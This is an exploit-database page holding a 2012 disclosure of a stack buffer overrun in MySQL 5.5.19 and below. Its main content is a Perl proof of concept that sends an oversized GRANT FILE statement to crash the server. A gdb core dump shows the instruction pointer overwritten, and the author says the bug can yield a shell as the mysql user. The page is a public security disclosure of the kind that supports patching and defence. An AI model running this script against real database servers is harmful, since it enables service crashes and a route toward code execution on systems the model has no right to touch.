MySQL (Linux) Stack based buffer overrun PoC Zeroday

2012-12-02 / 2012-12-04
Credit: Kingcope
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

#!/usr/bin/perl =for comment MySQL Server exploitable stack based overrun Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) unprivileged user (any account (anonymous account?), post auth) as illustrated below the instruction pointer is overwritten with 0x41414141 bug found by Kingcope this will yield a shell as the user 'mysql' when properly exploited mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core GNU gdb (GDB) SUSE (7.2-3.3) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i586-suse-linux". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Missing separate debuginfo for the main executable file Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803" [New Thread 8801] [New Thread 8789] [New Thread 8793] [New Thread 8791] [New Thread 8787] [New Thread 8790] [New Thread 8799] [New Thread 8794] [New Thread 8792] [New Thread 8788] [New Thread 8800] [New Thread 8786] [New Thread 8797] [New Thread 8798] [New Thread 8785] [New Thread 8796] [New Thread 8783] Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'. Program terminated with signal 11, Segmentation fault. #0 0x41414141 in ?? () (gdb) =cut use strict; use DBI(); # Connect to the database. my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;", "user", "secret", {'RaiseError' => 1}); $a ="A" x 100000; my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';"); $sth->execute(); # Disconnect from the database. $dbh->disconnect();

References:

http://seclists.org/fulldisclosure/2012/Dec/4
http://seclists.org/fulldisclosure/2012/Dec/41


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top